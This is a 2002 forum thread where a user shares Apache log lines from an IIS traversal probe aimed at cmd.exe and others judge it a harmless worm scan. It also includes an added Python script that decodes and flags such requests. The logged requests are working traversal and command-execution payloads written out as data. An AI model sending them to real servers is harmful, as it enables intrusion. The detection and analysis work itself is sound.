
Thread: Malicious?

  1. #1
    Senior Member
    Join Date
    Oct 2001
    Posts
    689

    Post Malicious?

    I'm not a pro at Apache yet, so when I saw a lot of 404 errors close together with a very distinctive pattern, I became suspicious. I copied part of the log so you could see it and tell me whether someone was trying some crap with me. I omitted the IP in case I'm wrong. All of this was from a single IP, and it appears as though someone was under the impression I used NT. The fact that they were trying to access the scripts folder leads me to believe they had malicious intentions.

    - - [31/May/2002:03:19:45 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
    - - [31/May/2002:03:19:47 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
    - - [31/May/2002:03:19:48 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 "-" "-"
    - - [31/May/2002:03:19:48 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 "-" "-"
    - - [31/May/2002:03:19:48 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 "-" "-"
    - - [31/May/2002:03:19:49 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 367 "-" "-"
    - - [31/May/2002:03:19:49 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
    - - [31/May/2002:03:19:49 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
    - - [31/May/2002:03:19:49 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
    - - [31/May/2002:03:19:49 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-"
    - - [31/May/2002:03:19:49 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 317 "-" "-"
    - - [31/May/2002:03:19:49 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 317 "-" "-"
    - - [31/May/2002:03:19:49 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 "-" "-"
    - - [31/May/2002:03:19:49 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 "-" "-"
    Wine maketh merry: but money answereth all things.
    --Ecclesiastes 10:19
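The log lines in this post are the well-known IIS traversal probes: `%255c`, `%%35%63` and `%25%35%63` are double-encoded backslashes that only become `\` after a second percent-decode pass, while `%c0%af`, `%c0%2f`, `%c1%9c` and `%c1%1c` are overlong (invalid) two-byte UTF-8 forms of `/` and `\`. Apache decodes none of them into a separator, which is why every request here ends in 404 (or 400 for the malformed `%%35` escapes). The script below is an added example, not code from the original poster: it parses log lines in this format, decodes each request target the way a vulnerable IIS would (two percent-decode passes plus a simplified, assumed model of the lax overlong-UTF-8 decoder), resolves the resulting path, and flags requests that reach `cmd.exe` or climb above the web root. The sample lines are copied from the post above, with one constructed benign request added for contrast; the regex, function names and reason strings are this example's own.

```python
"""Detect IIS Unicode / double-decode traversal probes in an Apache access log.

Added example (not the poster's code): each request target is decoded the way
a vulnerable IIS would see it, then the resolved path is inspected.
"""
import re
from urllib.parse import unquote_plus, unquote_to_bytes

# Lines copied from the post above (client IP removed by the poster), plus one
# constructed benign request at the end for contrast.
SAMPLE_LOG = [
    '- - [31/May/2002:03:19:45 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"',
    '- - [31/May/2002:03:19:48 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 "-" "-"',
    '- - [31/May/2002:03:19:49 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"',
    '- - [31/May/2002:03:19:49 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"',
    '- - [31/May/2002:03:19:49 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 317 "-" "-"',
    '- - [31/May/2002:03:19:49 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 "-" "-"',
    '- - [31/May/2002:03:20:10 -0400] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"',  # constructed
]

# Apache common/combined format. The host field is optional because the poster
# stripped it, leaving lines that begin "- - [date]".
LOG_RE = re.compile(
    r'^(?:(?P<host>\S+) )?\S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def percent_decode(text: str, passes: int = 2) -> bytes:
    """Percent-decode `passes` times. Two passes model the IIS "superfluous
    decode" flaw: %255c -> %5c -> '\\'. unquote_to_bytes leaves a '%' that is
    not followed by two hex digits untouched, so %%35%63 -> %5c -> '\\' too."""
    raw = text.encode("latin-1")
    for _ in range(passes):
        raw = unquote_to_bytes(raw)
    return raw


def iis_lax_utf8(raw: bytes) -> str:
    """Assumed, simplified model of the IIS overlong-UTF-8 decoder bug: a 0xC0/0xC1
    lead byte is accepted even though the result is an ASCII character, and the low
    six bits of the next byte are used without checking that it is a continuation
    byte. Hence %c0%af and %c0%2f -> '/', %c1%9c and %c1%1c -> '\\'. Other bytes
    are passed through as Latin-1."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def resolve(target: str):
    """Return (resolved_path, escaped_webroot, decoded_query) for a request target."""
    path, _, query = target.partition("?")
    decoded = iis_lax_utf8(percent_decode(path)).replace("\\", "/")
    stack, escaped = [], False
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True  # more '..' than directories: left the web root
        else:
            stack.append(seg)
    return "/" + "/".join(stack), escaped, unquote_plus(query)


def classify(line: str):
    """Return a finding dict for a suspicious log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m["target"]
    path, escaped, query = resolve(target)
    one, two = percent_decode(target, 1), percent_decode(target, 2)
    reasons = []
    if "cmd.exe" in path.lower():
        reasons.append("resolves to cmd.exe")
    if escaped:
        reasons.append("escapes the web root")
    if one != two:
        reasons.append("double-encoded separator")
    if any(b >= 0xC0 for b in two):
        reasons.append("overlong UTF-8 separator")
    if not reasons:
        return None
    return {"ts": m["ts"], "status": m["status"], "path": path,
            "query": query, "reasons": reasons}


def scan(lines):
    """Run classify() over every line and keep the findings."""
    return [f for f in (classify(l) for l in lines) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["status"], f["path"], f["query"], "|", "; ".join(f["reasons"]))
```

On the Apache log above every finding carries a 404 or 400, which is what makes the thread's verdict ("harmless here") right; the same decoding run over an IIS log is where a 200 on one of these targets would mean the traversal actually worked and `cmd.exe` was reached.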

  2. #2
    Junior Member
    Join Date
    Nov 2001
    Posts
    3
    Just something you're not vulnerable to.
    This is nothing really harmful for you, since you don't have an NT server.
    It is only like a small DOS attack; as long as it doesn't change to a DDOS, your server should be fine.

  3. #3
    Senior Member
    Join Date
    Oct 2001
    Location
    Helsinki, Finland
    Posts
    570
    Well, if you were running the Linux version, it seems to me that you're safe.
    Cheops, it doesn't really look like a DOS attack; they were trying to get to the command prompt... (DOS is for 'Denial Of Service' but also for 'Diskette Operating System'... We were discussing the first one, weren't we?)
    Q: Why do computer scientists confuse Christmas and Halloween?
    A: Because Oct 31 = Dec 25

  4. #4
    Senior Member
    Join Date
    Jan 2002
    Posts
    218
    Just a very lame exploit, only good on IIS servers, man. Your *nix box has nothing to fear from that script kiddie. It could have been another IIS server infected with a worm; everyone on your subnet probably received it too. It happens quite often. I had to email a webmaster one time because his IIS server was infected with a worm and was scanning the entire subnet for other IIS servers. It was ignorable until it continued to probe my machine over and over and started to lag my Unreal Tournament gaming! That was unacceptable, so I took care of the problem. If you continue to get them, do a little investigating on the user's IP and see if you find any traces of what appears to be a worm or anything unusual. Check to see if they are running a web server (point your web browser to their IP at port 80 or 8080) and have any contact info, so you can advise them to check their machine. If you cannot get hold of them, contact your ISP because, as I said, if it is a worm you will not be the only one, and I am sure they will try to take care of it.
